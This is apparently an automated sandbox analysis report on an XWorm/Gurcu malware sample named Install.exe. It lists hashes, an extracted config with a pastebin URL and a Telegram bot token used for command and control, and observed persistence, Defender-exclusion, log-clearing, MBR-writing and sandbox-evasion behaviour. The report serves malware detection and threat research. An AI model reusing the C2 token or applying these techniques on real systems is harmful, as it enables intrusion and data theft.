Analysis
-
max time kernel
990s -
max time network
444s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
14-12-2024 11:59
Static task
static1
Behavioral task
behavioral1
Sample
Install.exe
Resource
win10v2004-20241007-en
General
-
Target
Install.exe
-
Size
259KB
-
MD5
28db4677dcbbaa0a4c5adbc02c9da4f3
-
SHA1
e1f0199ed131a90e25204399e4e876da64ea3ba5
-
SHA256
b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c
-
SHA512
718ad88f930160a83c59d9f73d41cf4ea76de3c929956bffb618631d6450b7f59d4b2eb62afa59eff29461b256c402d387df9fdadee9a1a9d1b5e65cea45de52
-
SSDEEP
6144:ByHp/aGMFlSShM00Iyew/2xrvhwCS9KSyiIBov:IJ/pFJIyN/2RbhHiIS
Malware Config
Extracted
xworm
-
Install_directory
%ProgramData%
-
install_file
ntoskrnl.exe
-
pastebin_url
https://pastebin.com/raw/Zx6DUkf9
-
telegram
https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434
Extracted
gurcu
https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434
Signatures
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/files/0x000b000000023b69-13.dat family_xworm behavioral1/memory/1396-22-0x00000000005E0000-0x00000000005FC000-memory.dmp family_xworm behavioral1/memory/676-1390-0x0000000000290000-0x00000000002AC000-memory.dmp family_xworm -
Gurcu family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3744 created 624 3744 powershell.EXE 5 -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4356 powershell.exe 1156 powershell.exe 3352 powershell.exe 4552 powershell.exe 3744 powershell.EXE -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation KrnlSetupSus.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk KrnlSetupSus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk KrnlSetupSus.exe -
Executes dropped EXE 3 IoCs
pid Process 696 Install.exe 1396 KrnlSetupSus.exe 676 ntoskrnl.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntoskrnl = "C:\\ProgramData\\ntoskrnl.exe" KrnlSetupSus.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\K: svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 17 pastebin.com 18 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe -
Drops file in System32 directory 20 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\ntoskrnl svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D lsass.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 OfficeClickToRun.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\WindowsUpdate\Scheduled Start svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3744 set thread context of 4992 3744 powershell.EXE 87 -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe -
Checks processor information in registry 2 TTPs 17 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1068 timeout.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-4089630652-1596403869-279772308-1000\02bryizledriczzo\DeviceId = "<Data><User username=\"02BRYIZLEDRICZZO\"><HardwareInfo BoundTime=\"1734177587\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1734177669" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-4089630652-1596403869-279772308-1000\ValidDeviceId = "02bryizledriczzo" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-4089630652-1596403869-279772308-1000\02bryizledriczzo svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02fgibqbpmzxqnqb svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02cnxzkyvoskyhsq svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-4089630652-1596403869-279772308-1000\02bryizledriczzo\DeviceId = "<Data DAInvalidationTime=\"1734177588\"><User username=\"02BRYIZLEDRICZZO\"><HardwareInfo BoundTime=\"1734177590\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 14 Dec 2024 12:01:09 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02fgibqbpmzxqnqb\Response Saturday, December 14, 2024 11:59:45 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAApD0hegy5ek23afl22GQuOQAAAAACAAAAAAAQZgAAAAEAACAAAAA0+Z+t6mZ9ZDFKNwxPXopFRO7Y8ZSQ6wIOK4XBcCa4UwAAAAAOgAAAAAIAACAAAACAmGxJtrJd8hV9/gqFs5V/w+e4lDuMxD+FjX4rxO9dooAHAADYSg7S0VDHaG2PEOt26JQcB2OdX0Tvorx8jDctzW7s3HYocLgljp3CKDDk5dD3qszKoXqO5igMLebsromEkGEk1KzBLYo3bem4yP7uaitscS7Iy5ELxdP101Zzb1eb68m5T2Mcwrf88rB6D7aB2K7PlTYnFu4E6X5+HRU+lDL+H5MOjXYmv84gHnnHyTa8qBGOTZj7vOuFE9oLkOeFh3nywOLqfrxGu7z75TKPITWcCRHnnx7QzMvr0z7pX7XgMvAZ6aOMaKjtA/8dOyXPa1F5BdJUQi4G+3BOcS9QdvL2S33SfFxyuHy2Xvg27tVYoWMxFX25br/ZdqzmIRD/9uOVzHhiJ08WbFs4jPClgILPua5wlqt62AVntIK5xJY0JhNXckgYkOnY67bgBC02cOp37JnFlonODMxnHyEvRYHuLoQaEIM/3i/uQbGjkuJvq9IcVkt4XPZp6WzKZ0UzEkW15SLJc3gT/uafaqfVv2XKWtsM5jWl3ysRooBaA7zkdK5Mong+USf2bLLE9T8DM7ybXuFrK0RUU4yV5qVTPAAvFL8L57kx/zUTIF4RwLdDnX49/mKPg+YKLSURiqhtKtVPK4gEVXbjusIPF2l7aOjR3i8UKW4G1wQ0PlcpiW03YQOGMQDSMPQva8QiwmL1dIOEvoI6kEhGMDkPLfmo6GVsUWJpHIxuv+bR8DL/+A7Re6CokmWpA0kgPtSBR/PwOYtvg/12JEw/lifSCgd3AJOim8f5Y7YFGSNc22zTNK/ltzLftDTEsaTQ4i+vw75vo8BqP+e3+yo7vinqmV2L3db/sP5xIAdQpYxgRTDGLtV4dyOWWjt1FGnMve3P1h4RIiR9w0icrA/omQFscnH8l/s1Zn8RlWmveBHffidDa3UnLsHMHdbEiBbK7N4nfC5uAMZdnV+P7Ob2ZQCv2dIUsUCPU+XvCrZIg15PCupJCu97VC72YKiI3gyL1miNmIARit0oQJwq2FAe3uBrxEb1yaDTDHFMRxaxG+ctFu6yX6Yc2Jwmhs2If/42wpYoyRtFM1dBAtydQ4ZLknpMid1R6BP+PwwMGbk+hRvtSRFN9QqyuoQ5z81WfkZ6XNtROQctDCIabhapY8ZmUXbDwEdeKgx324vTvftXmyS5qt9guBXJvVV80MbGopmmaaI/6b698mV7FqyjbrPQ8roL8jmv53OYtOexmqm1JihrUPNcw0a9Jpl5xccUHlgVM3VtrK13ZWb/O8wR/m8mwkXgps3XOsrgTRbWALujTy2DlkeaH8G4mVua864AiOK2yIzi0bvpNRV4cwmB5AX3jdUCTO1nzRzCBx+H0hvcNHhNMPQjHBCPJCrB23pSdAIMfkVQapZvgOXWyo2yervMkSEOHBF5n6uoCOjA//hzzJcBK5RdEmfmKXq6U027BGYgJLYgY2/v38KN6BjaaDI1p06erToHqaa39IrfG+4av04rQhk1YcKnEIoSL5Gejd5NbSXiEqoOjkyGoECL0NLmkiYHZ8lppGK2q+JJDZwYZLzVqsPVxDsvSXt9Cw2bV3PsEPWljEkSfPOvNfWc04Od0D8DSIOAa49bYRH2hU1L9q4Y1sRsRL2kEV82NoVMvkzpCiqR1XAb9wQAiLhuZykAqCUR13B8lKcvCG0VJ1KkFvr3C9vDKirJfKOTmxDMpdyLx2Hl5kfQRKw6nLv4T3g5QFxLsXYRXYuvsQq/XPy7hERBmy8cyHPv51WdnLsxiCSeH2HtB+8siKICHA7Rk8tP1C4pkVfXDaZZ7JbdjJJlU6uyqjhY2j80yl7G8pekpKhMNSmQZKCRbr8ujMDMZC03fO+JDLPx58L2NLnoF3awZTSQSwbfmJZJkKQAQpE6nZ/LKuR9Nnb31O0PTka5R8Ir+NKYveLTkS0SI1TRRtW0oz21S3eOo+YYtrLC5gDaPttmm5wd+PjOD30m03l7K6YcdD0HuMyPdFZnawrYmiZuGk7eOG5GLdoo1C9hdrGXiM+iyi8JQ/hposMFZnXFQJqoABmrvop6vk9lDPcplO/pfkdG6BzteNqd0qZZbBlz2CczK/khae18pIhv5vTxdVajlIQO/ivMlvbNP0+YAJ95SB9nHw/nY4w1acYRk4e/qaWKufs2aUbeAG5hVilhxNRLuqF6epJVBXB30BCxYB40tG+JRF+q0xVz5aZVWLWXCp4d6b/9GbYul2RYc5odlizTGzU5/9yR1DdDUGx4ApsXqWcVPjv126NXXZUWW+6b3cg0AlLBdzmFXcDSyKLfK/bpAMwsWpBbteqMJPi4wzRXeLBYx3qjm2/GFdSW/S3sc2aGjVPxswJnFEc+2jSwqw05vokLeC4Y+zSsJ0Ebfa/FSH+Qeetu/n20x8lvgAt665ne2lck1kPTNNZY6xIXW7vVXSZzOWrF2c+P5qgkbJq/XVIOi0HvBAn1QjnVgAglJI+N4kNCwHhi9240JB9uMw2CzqNLpDE2ZT/b72dPtkaZVK+FIXEHBHtf0tfyagC2WgGbvK1kElcp61U2SzPHMgJaVF/uub2ZcIACjT9WLMpc/v2/d1ft0Tpe1oBAAAAA/5CH5Me3kk2BcPx2PAh9QHOtzS3oPlRxSzyGCB+1y44ddFyWt0s/YkrIj/GA3l+/4iPIgDUdIQNJVdYqE+/nVA==" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-4089630652-1596403869-279772308-1000\02bryizledriczzo\DeviceId = "<Data DAInvalidationTime=\"1734177588\"><User username=\"02BRYIZLEDRICZZO\"><HardwareInfo BoundTime=\"1734177589\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={292BA0D8-71DC-48A3-8D26-A83ACA9C9665}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-4089630652-1596403869-279772308-1000\02fgibqbpmzxqnqb\Reason = "2147780641" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created 